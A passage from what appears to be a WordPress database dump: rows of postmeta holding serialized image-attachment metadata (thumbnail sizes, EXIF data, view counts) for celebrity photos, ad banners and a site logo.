"Pop-Singer-Chris-Brown-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:35:\"Pop-Singer-Chris-Brown-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:34:\"Pop-Singer-Chris-Brown-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37,14,'_wp_attachment_image_alt','Pop Singer Chris Brown'),(38,12,'_thumbnail_id','14'),(40,15,'_edit_lock','1444834749:6'),(41,15,'_edit_last','6'),(42,16,'_wp_attached_file','2015/06/George-Clooney.jpg'),(43,16,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:26:\"2015/06/George-Clooney.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"George-Clooney-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"George-Clooney-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"George-Clooney-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"George-Clooney-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"George-Clooney-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"George-Clooney-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"George-Clooney-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"George-Clooney-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"George-Clooney-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"George-Clooney-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"George-Clooney-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"George-Clooney-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"George-Clooney-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"George-Clooney-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"George-Clooney-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:27:\"Canon EOS DIGITAL REBEL XTi\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1315602341\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:52:\"George Clooney -Toronto Int. Film Festival 2011 1565\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:1:{i:0;s:4:\"TIFF\";}}}'),(44,16,'_wp_attachment_image_alt','George Clooney'),(45,15,'_thumbnail_id','16'),(47,17,'_edit_lock','1444837694:6'),(48,17,'_edit_last','6'),(51,20,'_edit_lock','1485546682:7'),(52,20,'_edit_last','7'),(53,20,'_wp_page_template','default'),(54,20,'_wpb_vc_js_status','true'),(55,20,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56,20,'slide_template','default'),(57,20,'td_homepage_loop','a:1:{s:5:\"limit\";s:2:\"10\";}'),(58,21,'_wp_attached_file','2015/06/John-Constantine-Unitas.jpg'),(59,21,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:849;s:6:\"height\";i:565;s:4:\"file\";s:35:\"2015/06/John-Constantine-Unitas.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:33:\"John-Constantine-Unitas-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:34:\"John-Constantine-Unitas-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-696x463.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:35:\"John-Constantine-Unitas-631x420.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1366385038\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(60,17,'_thumbnail_id','21'),(62,17,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(63,17,'slide_template',''),(64,17,'post_views_count','389'),(65,15,'post_views_count','308'),(66,12,'post_views_count','266'),(67,10,'post_views_count','266'),(68,6,'post_views_count','240'),(69,4,'post_views_count','264'),(71,22,'_edit_lock','1444837831:6'),(72,22,'_edit_last','6'),(73,24,'_wp_attached_file','2015/06/Enrique-Iglesias.jpg'),(74,24,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:682;s:4:\"file\";s:28:\"2015/06/Enrique-Iglesias.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Enrique-Iglesias-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:26:\"Enrique-Iglesias-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:27:\"Enrique-Iglesias-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Enrique-Iglesias-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"Enrique-Iglesias-631x420.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(75,24,'_wp_attachment_image_alt','Enrique Iglesias'),(76,22,'_thumbnail_id','24'),(78,22,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(79,22,'slide_template',''),(80,22,'post_views_count','328'),(81,25,'_wp_attached_file','2015/06/logo.png'),(82,25,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:280;s:6:\"height\";i:96;s:4:\"file\";s:16:\"2015/06/logo.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"logo-150x96.png\";s:5:\"width\";i:150;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:14:\"logo-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:15:\"logo-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:15:\"logo-218x96.png\";s:5:\"width\";i:218;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:15:\"logo-265x96.png\";s:5:\"width\";i:265;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(83,26,'_wp_attached_file','2015/06/ad-160x600.jpg'),(84,26,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:160;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2015/06/ad-160x600.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"ad-160x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ad-160x600-80x300.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"ad-160x600-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"ad-160x600-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x150.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x198.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x160.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x235.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x400.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x220.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x364.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x261.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x462.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x385.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x486.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"ad-160x600-160x580.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"ad-160x600-112x420.jpg\";s:5:\"width\";i:112;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85,27,'_wp_attached_file','2015/06/ad-300x250.jpg'),(86,27,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:250;s:4:\"file\";s:22:\"2015/06/ad-300x250.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"ad-300x250-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"ad-300x250-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"ad-300x250-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"ad-300x250-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"ad-300x250-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"ad-300x250-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"ad-300x250-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"ad-300x250-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"ad-300x250-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(87,28,'_wp_attached_file','2015/06/ad-728x90.jpg'),(88,28,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:728;s:6:\"height\";i:90;s:4:\"file\";s:21:\"2015/06/ad-728x90.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"ad-728x90-150x90.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"ad-728x90-300x37.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"ad-728x90-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"ad-728x90-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:20:\"ad-728x90-218x90.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:20:\"ad-728x90-265x90.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:20:\"ad-728x90-324x90.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:20:\"ad-728x90-324x90.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:20:\"ad-728x90-324x90.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:20:\"ad-728x90-356x90.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:20:\"ad-728x90-356x90.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:20:\"ad-728x90-533x90.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:20:\"ad-728x90-534x90.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:20:\"ad-728x90-696x86.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:86;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:20:\"ad-728x90-696x90.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(89,26,'_edit_lock','1435159644:2'),(188,38,'_wp_attached_file','2015/06/logo1.png'),(189,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:280;s:6:\"height\";i:96;s:4:\"file\";s:17:\"2015/06/logo1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"logo1-150x96.png\";s:5:\"width\";i:150;s:6:\"height\";i